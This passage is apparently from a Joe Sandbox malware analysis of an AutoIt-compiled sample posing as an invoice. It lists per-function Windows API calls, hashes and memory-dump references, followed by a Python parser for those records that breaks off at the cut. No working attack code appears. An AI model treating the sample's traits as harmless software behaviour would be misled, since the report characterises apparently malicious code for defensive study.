• Opcode ID: 65881257cdbbde67844a3b64d939e5a190b96b9f997a60fe2726c97d56abfbdf
• Instruction ID: 568e2fc28fd671a7163fd8a14614e6f6c81f4df3ebfea6699e93647efe8d3327
• Opcode Fuzzy Hash: 65881257cdbbde67844a3b64d939e5a190b96b9f997a60fe2726c97d56abfbdf
• Instruction Fuzzy Hash: 8E11B271320209BFEF119F54DC80EBB376EEB893A5F104125FD189B290D6719CA68B64
APIs
  • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
• GetActiveWindow.USER32 ref: 0025DA7B
• EnumChildWindows.USER32(?,0025D75F,00000000), ref: 0025DAF5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: Window$ActiveChildEnumLongWindows
• String ID: T1$
• API String ID: 3814560230-1856683037
• Opcode ID: 94b738b2943dcc964a3d00ade7975be1ea2149b21a3d7e50e9abd97f3967a64d
• Instruction ID: 36c81ba69c4a0a7bf549263485be1ad5210aa275056f9c50937919f2753bcfc2
• Opcode Fuzzy Hash: 94b738b2943dcc964a3d00ade7975be1ea2149b21a3d7e50e9abd97f3967a64d
• Instruction Fuzzy Hash: CB213B35624201DFC724DF28E864AA677F9EF49321F650619E96A873E0D730A864CF64
APIs
  • Part of subcall function 0020D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
  • Part of subcall function 0020D17C: GetStockObject.GDI32(00000011), ref: 0020D1CE
  • Part of subcall function 0020D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
• GetWindowRect.USER32(00000000,?), ref: 00259968
• GetSysColor.USER32(00000012), ref: 00259982
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 8e3ce2b92f6080d18b5cd9d46cf3464d0c29ee1b3c4a97ffca282bc9db3cf180
• Instruction ID: 44031d0302336febff3c37eba3d7d38c760584e3ff4feead1858e87a2e0b3c22
• Opcode Fuzzy Hash: 8e3ce2b92f6080d18b5cd9d46cf3464d0c29ee1b3c4a97ffca282bc9db3cf180
• Instruction Fuzzy Hash: 0B11267252020AAFDB04DFB8DC45AEA7BB8FF08355F014628FD55E2250E734E864DB64
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00259699
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002596A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: 0404a1e8b0c91267a2cd7d71fb2d6af966798c2a8e0cdb20d9450545863d9707
                                                              • Instruction ID: 7dbd69ab3872199f181d08f334a8c0ded74b323b761873782d3451267f734219
                                                              • Opcode Fuzzy Hash: 0404a1e8b0c91267a2cd7d71fb2d6af966798c2a8e0cdb20d9450545863d9707
                                                              • Instruction Fuzzy Hash: 70118B71120106EAEB105E64EC44AAB376EEB05369F504314FD25931E0C771DCA89B68
                                                              APIs
                                                              • _memset.LIBCMT ref: 002352D5
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002352F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: dce179da04eac315d409ee7a20963db6f23a482aad4a19af11f807ab9d3a78f6
                                                              • Instruction ID: 7eaf3bb41d760c928f2ba6d9bc4cb1219c112ab97025807a1d43b530c6940e6b
                                                              • Opcode Fuzzy Hash: dce179da04eac315d409ee7a20963db6f23a482aad4a19af11f807ab9d3a78f6
                                                              • Instruction Fuzzy Hash: 0C11E6B1D21635ABDB10DF98D944B9E77B8AF05750F140155ED0AE7190D3B0ED24CB90
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00244DF5
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00244E1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: bd9904104af70e05bcefcf587b3dba0300c62ebf69d3d1151be32e161dbd583f
                                                              • Instruction ID: 7b10715a0120b40d8ff77abfa09b3302b2a3e0bb93c9e628df12ffd5e8aea191
                                                              • Opcode Fuzzy Hash: bd9904104af70e05bcefcf587b3dba0300c62ebf69d3d1151be32e161dbd583f
                                                              • Instruction Fuzzy Hash: 8511A070A21222FBDB2D9F51CC89FFBFAA8FF06755F10822AF50656140D3B059A0C6E0
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002237A7
                                                              • ___raise_securityfailure.LIBCMT ref: 0022388E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                              • String ID: (+
                                                              • API String ID: 3761405300-3490531655
                                                              • Opcode ID: 6bd03e6320d3d0a5dae9f1fae40aee9d25a09b6db66edcefd1b06f0519da6c51
                                                              • Instruction ID: 2d113fdf9ae4aad5f92a4bb895b109f3c78362213bec14f65c72c16e54bd32a9
                                                              • Opcode Fuzzy Hash: 6bd03e6320d3d0a5dae9f1fae40aee9d25a09b6db66edcefd1b06f0519da6c51
                                                              • Instruction Fuzzy Hash: 27211FB5511204DBD746DF65F9CAA427BB0FB4C310F109A2AE9088A3A0E3F4E990CF45
                                                              APIs
                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0024A84E
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0024A88B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: htonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 3832099526-2422070025
                                                              • Opcode ID: 67fc48eeee5a5cf4ba5c2df2fe1511cb74ec43d2306c172e0b459a086b611b79
                                                              • Instruction ID: 3848c18b1f2bcfedd5415423b9731368201d57f34ea3a25940b36f6a6981bbde
                                                              • Opcode Fuzzy Hash: 67fc48eeee5a5cf4ba5c2df2fe1511cb74ec43d2306c172e0b459a086b611b79
                                                              • Instruction Fuzzy Hash: 8101F579250305ABCB19DF68D88AFADB368FF45310F208426F516AB3D1D771E821CB52
                                                              APIs
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0022B7EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 5b9caa1de6e6614cbbfc74cb96f1cc7b571fff34aa3000a9a2c8c0ec7dd72c4c
                                                              • Instruction ID: 07f16c813c3c4911a76e947ff765e8c1ec181351ddcb292674fb51633cdbe408
                                                              • Opcode Fuzzy Hash: 5b9caa1de6e6614cbbfc74cb96f1cc7b571fff34aa3000a9a2c8c0ec7dd72c4c
                                                              • Instruction Fuzzy Hash: 4501247562012CBBCB05EFE4EC529FE7369BF56350B04061CF562A72C2EFB058289B90
                                                              APIs
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0022B6EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 37cb1d3ca52d95618ac3a6e7f56b1248d5f730b69fa07a6db820687e4291a23e
                                                              • Instruction ID: 7385ed6b44a0b2add73edefc341eaaa724e456c9607222bf7232601fcb985549
                                                              • Opcode Fuzzy Hash: 37cb1d3ca52d95618ac3a6e7f56b1248d5f730b69fa07a6db820687e4291a23e
                                                              • Instruction Fuzzy Hash: A7018FB5651019BBCB05EBA4EA52AFE73AC9F16344B100019B502B3292DF905E289BE5
                                                              APIs
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 0022B76C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 498495726c7c44e8e0f2dd10e96d07745f23b46f0892423e17cf403099eaadfe
                                                              • Instruction ID: 9bf0fff52c452272f962d8d30a62a2afe17d54db06eac8a4707479009fa9c15b
                                                              • Opcode Fuzzy Hash: 498495726c7c44e8e0f2dd10e96d07745f23b46f0892423e17cf403099eaadfe
                                                              • Instruction Fuzzy Hash: D701D6B665011DBBCB01EBE4EA12EFE73AC9F16344F500019B501B3192DBA05E2997B5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID: "+
                                                              • API String ID: 3494438863-4013894652
                                                              • Opcode ID: de30142b96fd8cd6d35b542d9a6f12b491d2b6541bb6e81b767c25a62bd46128
                                                              • Instruction ID: 69bc6bdb039007aaafb793e3682a8567417bb69789865e5a353772d252efe2ba
                                                              • Opcode Fuzzy Hash: de30142b96fd8cd6d35b542d9a6f12b491d2b6541bb6e81b767c25a62bd46128
                                                              • Instruction Fuzzy Hash: 60F0C871239712DBEB14AF29FC496E667D4E725720B10022AF608CA284E770C8D18B94
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 360c100851702dde7e8624a9838e37307ca120d9286e60a06ce5f3bb7cdac14d
                                                              • Instruction ID: 1a18047fb00edc82e676f7026d0f3ac3700a84af90af17a0d101b540a8e904ab
                                                              • Opcode Fuzzy Hash: 360c100851702dde7e8624a9838e37307ca120d9286e60a06ce5f3bb7cdac14d
                                                              • Instruction Fuzzy Hash: 66E0D877A0432537DB20EAA5EC4AFD7FBACEB51B60F00015AF905D3041D670E6518BD4
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0022A63F
                                                                • Part of subcall function 002113F1: _doexit.LIBCMT ref: 002113FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: 48887d4b05fc8cd0796a6b1da1de50c9b08f6277d49a912f276051851ea13658
                                                              • Instruction ID: 5a257d4c11a09969510e303d3110f17516f9c92ef47ef5d6878daa7aff2b990c
                                                              • Opcode Fuzzy Hash: 48887d4b05fc8cd0796a6b1da1de50c9b08f6277d49a912f276051851ea13658
                                                              • Instruction Fuzzy Hash: 73D012312D532933D31436AC7D1BFD9668C9B16F55F140055BB08959C24AE696A042DA
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0026ACC0
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0026AEBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: DirectoryFreeLibrarySystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 510247158-3257408948
                                                              • Opcode ID: b7489b863f2e0b49331d8076626b8a4008f099e1483bb6a68b08cbba5a5380fc
                                                              • Instruction ID: e120a4939cd893ebe75e9b222c6b54d6664a0602e5bba6ee5a53fcfe543dbf71
                                                              • Opcode Fuzzy Hash: b7489b863f2e0b49331d8076626b8a4008f099e1483bb6a68b08cbba5a5380fc
                                                              • Instruction Fuzzy Hash: 8BE0C9B0C20649DFDB15DFA9E9489ECB7B8AB48301F148186E116B25A1DB705AD4DF22
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002586A2
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002586B5
                                                                • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: d5efafb8e77eb4f15412abf3d0b580f87bd1f63a8f6045cb90ebb1266e0c899e
                                                              • Instruction ID: c730e12370a8b6f1de278b95ed6dbf428d41dfabacb528039835f0bfb9dbbcdc
                                                              • Opcode Fuzzy Hash: d5efafb8e77eb4f15412abf3d0b580f87bd1f63a8f6045cb90ebb1266e0c899e
                                                              • Instruction Fuzzy Hash: 56D01271795318B7E674A770BC4FFC67B689F05B21F500815B74DAA1D0C9E0E990CB54
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002586E2
                                                              • PostMessageW.USER32(00000000), ref: 002586E9
                                                                • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 529732e3af119f94a3a9323c46b9b0e9c3533049b245e9f78f23d71e49bb4592
                                                              • Instruction ID: c8bf6ac6454fe51d811ab63b5a1414af7bb7bda867aa86b677af9ea6b699ca5e
                                                              • Opcode Fuzzy Hash: 529732e3af119f94a3a9323c46b9b0e9c3533049b245e9f78f23d71e49bb4592
                                                              • Instruction Fuzzy Hash: A9D0C9717953186BE664A770AC4FFC66A689B0AB21F500815B649AA1D0C9A0A9908A54
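The function records above (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are what an analyst compares across reports, but the page only shows them as flat text. The parser below, an added example that is not Joe Sandbox code, turns the records into structured entries: direct calls with their module, arguments and reference address, calls reached through a subcall, and the Similarity keys used for matching. The record layout is inferred from the report text itself; the sample is three records copied from this page, and the "Download File" suffix stripped from the Associated dump names is the report's download link fused onto the filename during extraction.

```python
"""Parse Joe Sandbox IDA-plugin function summaries into comparable records.
Added example for this page, not Joe Sandbox code; layout inferred from the report."""
import re
from collections import defaultdict

# "• Name.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:" for a call reached through a callee.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z0-9_]+)\.([A-Za-z0-9_]+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)
KV_RE = re.compile(r"^\s*•\s*([^:]+?):\s*(.*?)\s*$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # download-link text fused onto dump names on extraction

# Constructed sample: three records copied from the report (the GetSystemDirectoryW
# function, then the two Shell_TrayWnd functions), long ID lines dropped for brevity.
SAMPLE = """\
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 0026ACC0
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0026AEBD
Strings
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002586A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002586B5
  • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002586E2
• PostMessageW.USER32(00000000), ref: 002586E9
  • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
"""


def parse_entries(text):
    """Split report text into function entries, one per "APIs" heading."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = {"apis": [], "strings": [], "fields": defaultdict(list)}
            entries.append(cur)
            section = line
            continue
        if cur is None:  # tail of a truncated record before the first heading
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(raw)
            if m:
                subcall, name, module, args, ref = m.groups()
                cur["apis"].append({
                    "name": name, "module": module, "ref": ref,
                    "args": args.split(",") if args else [],
                    "subcall_of": subcall,  # None for a direct call
                })
        elif section == "Strings":
            cur["strings"].append(line.lstrip("• ").strip())
        else:
            m = KV_RE.match(raw)
            if m:
                key, value = m.groups()
                if value.endswith(LINK_RESIDUE):
                    value = value[: -len(LINK_RESIDUE)]
                cur["fields"][key].append(value)
    return entries


def direct_calls(entry):
    """'MODULE!Name' for calls the function makes itself, in address order."""
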